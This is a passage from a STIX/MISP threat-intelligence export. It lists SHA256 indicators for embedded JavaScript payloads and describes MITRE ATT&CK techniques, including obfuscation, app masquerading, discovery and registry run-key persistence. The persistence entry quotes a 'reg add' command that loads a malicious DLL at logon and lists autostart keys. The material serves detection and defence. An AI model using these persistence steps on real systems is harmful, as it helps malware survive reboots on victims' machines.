"identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '1c1499485254acb0d94ec6b4ffcb0c33d1dc154b5d95cc433a44c8bbb66c718f']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--f4ca19a5-b5fe-45f0-9143-83d0523c85e1", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'f87c6b520253d9d6b14a443ea2096baeb8cf532e9cc8843f39e6168cd873669d']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--e154a8ca-fcee-476b-99fd-199fb4e61a19", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '4f02b04252b268bffdc6584ced29254209fcac4ba7388527efa43786cad17aaa']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--79f280de-ff3f-4c56-9304-1c8a2bc6cbf4", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '33dc74a86e72a353412da885e5e07fe64b65f1769fe7ef17aa79b6bd6b36d0dc']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--4bcdb3e1-88f1-4d97-a0ff-23b6e1a99bab", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'f7cbe4349d4f95bbf08e1d649490fffe85e345976467bd1e0a066acfd3c2bb35']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--7f49d4ab-f033-46bb-8668-fd7daea19462", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '88c6525924bf306dc21aada7898084622bf6a224465123025a53b1c187ff8ae9']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--8e63f46b-17ee-432f-8bc3-87be9ad97efc", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '3edc38bb3ad101f6e56d99e4c9f173c16346315ec7bb36e3d7f327dbcbdcd606']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--7e9d47dd-6767-41a1-8300-651eda509db4", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '502a08fa74475ad5affeaac4a0f9e491df59a20c97796ce88284e79821ac8483']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--9de2a8bf-23a0-456b-892f-0234cde7c773", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'e71d4f329b7353f95f5f13f3fd33c4727f9f06f96083e199c18ad3cf1a2351fa']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--939b4f00-05ad-4620-8d3a-c61effe72dcf", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '6af30df6ee33ee44e93e34aed5fbe80bef0e7d1832d96f60c61e3eace5df315e']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--f886350c-1d12-4c20-981c-f195ab5bcfb0", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '65d96b763572ad2a7a03ab964225414de9fc7f4b820a603ef3f94f9203fbe4b2']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--f2733d9c-de03-485e-8b2e-65e69d176dc6", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'd3da04c58d81445754a4a837f3784e5fa7ec54ceeb8e595a836e9b87dc0c39cd']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--868385b2-a38d-4645-97ac-e64ca0da2c68", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '44bab852fa3bbaec1a03c900a8dace3c3553bf3c8289e5ffe9457633af0ea74a']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--a67ffa6e-0aee-4a2a-8741-46edcecd0da9", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'b02bc37b60170d53ff9d17ae0f75e6df5cde7287cede634bcb0042545585dd90']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--3921e712-ec5e-4454-baea-67035fb2efed", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '948ce1b8169805870338a59415ef470029323fc824a84bed9a760b2d78affb44']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--5d0a2c88-9adb-4a0c-9547-40567fc76c77", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'adfdf33b7f14b4509d1d1ec5155bb57ae381b6a04ebc97281a58d3246d7abaa3']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--eca477c7-0d4e-4d45-958b-cf7be7d50d1e", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '1a11ba0de41e053025e98f64d4b6ac044f6afd0db00fb91f97c447a4e63a5e78']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--715bc095-4974-4715-b8cd-57d2db13a770", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '17c6aaa3efc51678cf4c269ba99e62859967c5d2a6da0303e66d60c1e04b20b6']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--05993e61-45ea-40ce-a35b-c08e71a15c57", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '638ef4333b1b2993e945dbbc57f8a2a2ee0ab84bf02ef11a6a343a07f673784a']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--e2e2604e-7060-4b45-9077-7c80e9a15fc3", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '40bd419635471cf6c8df65142cb1cadfc1ed88bb6f9f921abbdaf5041503bc96']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--d75eb593-345e-4a8b-8c64-5a53d4fda34d", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'bf30f0045791417fa1e691b4974d5651ffd4310a536f30df325fe89365f1fd70']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--2ce951e8-c41d-45dd-a553-e477f81aa2c3", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '15929ca0bf26f189592cc6f2ba7fae8d10b0d84d86ecce2f74f583f7ebf849ed']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--4d033fe2-b1b7-417a-8955-c26dc1884ddb", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '832225013088d9619cca1bfc3192652fb434a2442ec33316342969c330b46825']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--98264004-0cd9-4add-9af5-d6647e55d32e", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '1cd45dac19c6d340f604546504393060d9b313d5b16a85f947e19daebc41dee5']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--f2fcfa1d-0b52-4afb-a7f5-2fd680815c66", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '1073bf25ac3af08cf3f48c2cbaed489ef43671387211d6e63f96aa7fcf1ec0b3']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--0457bee4-2e48-4d33-9e76-8c8772a073a6", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '543a1c4db82edce36ae07e4836b4d4a7640355bdf728d5ed41370892bf97d8a8']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--49fc12e2-76da-4892-95a9-dd6f73604892", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'e39a3ceb034e425f4554df867871bb7c5df43ba116dea05b173c4bd444789aea']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "attack-pattern", "id": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Obfuscated Files or Information - T1406", "description": "ATT&CK Tactic | An app could contain malicious code in obfuscated or encrypted form, then deobfuscate or decrypt the code at runtime to evade many app vetting techniques.(Citation: Rastogi) (Citation: Zhou) (Citation: TrendMicro-Obad) (Citation: Xiao-iOS)", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Obfuscated Files or Information - T1406\""], "external_references": [{"source_name": "NIST Mobile Threat Catalogue", "external_id": "APP-21"}]}, {"type": "attack-pattern", "id": "attack-pattern--a93ccb8f-3996-42e2-b7c7-bb599d4e205f", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Masquerade as Legitimate Application - T1444", "description": "ATT&CK Tactic | An adversary could distribute developed malware by masquerading the malware as a legitimate application. This can be done in two different ways: by embedding the malware in a legitimate application, or by pretending to be a legitimate application.\n\nEmbedding the malware in a legitimate application is done by downloading the application, disassembling it, adding the malicious code, and then re-assembling it.(Citation: Zhou) The app would appear to be the original app, but would contain additional malicious functionality. The adversary could then publish the malicious application to app stores or use another delivery method.\n\nPretending to be a legitimate application relies heavily on lack of scrutinization by the user. Typically, a malicious app pretending to be a legitimate one will have many similar details as the legitimate one, such as name, icon, and description.(Citation: Palo Alto HenBox)\n\nMalicious applications may also masquerade as legitimate applications when requesting access to the accessibility service in order to appear as legitimate to the user, increasing the likelihood that the access will be granted.", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Masquerade as Legitimate Application - T1444\""], "external_references": [{"source_name": "NIST Mobile Threat Catalogue", "external_id": "APP-14"}]}, {"type": "attack-pattern", "id": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Registry Run Keys / Startup Folder - T1547.001", "description": "ATT&CK Tactic | Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup</code>. The startup folder path for all users is <code>C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp</code>.\n\nThe following run keys are created by default on Windows systems:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: <code>reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n\nThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit</code> and <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell</code> subkeys can automatically launch programs.\n\nPrograms listed in the load value of the registry key <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> run when any user logs on.\n\nBy default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Registry Run Keys / Startup Folder - T1547.001\""], "external_references": [{"source_name": "capec", "external_id": "CAPEC-270"}]}, {"type": "attack-pattern", "id": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Remote System Discovery - T1018", "description": "ATT&CK Tactic | Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as  [Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039).\n\nAdversaries may also analyze data from local host files (ex: <code>C:\\Windows\\System32\\Drivers\\etc\\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.\n\nAdversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network.(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)  \n", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Remote System Discovery - T1018\""], "external_references": [{"source_name": "capec", "external_id": "CAPEC-292"}]}, {"type": "attack-pattern", "id": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Command and Scripting Interpreter - T1059", "description": "ATT&CK Tactic | Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nThere are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Command and Scripting Interpreter - T1059\""], "external_references": [{"source_name": "mitre-attack", "external_id": "T1059"}]}, {"type": "attack-pattern", "id": "attack-pattern--241814ae-de3f-4656-b49e-f9a80764d4b7", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Security Software Discovery - T1063", "description": "ATT&CK Tactic | Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1063) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\n\n### Windows\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), <code>reg query</code> with [Reg](https://attack.mitre.org/software/S0075), <code>dir</code> with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.\n\n### Mac\n\nIt's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Security Software Discovery - T1063\""], "external_references": [{"source_name": "mitre-attack", "external_id": "T1063"}]}, {"type": "attack-pattern", "id": "attack-pattern--7fd87010-3a00-4da3-b905-410525e8ec44", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Scripting - T1064", "description": "ATT&CK Tactic | **This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.**\n\nAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", 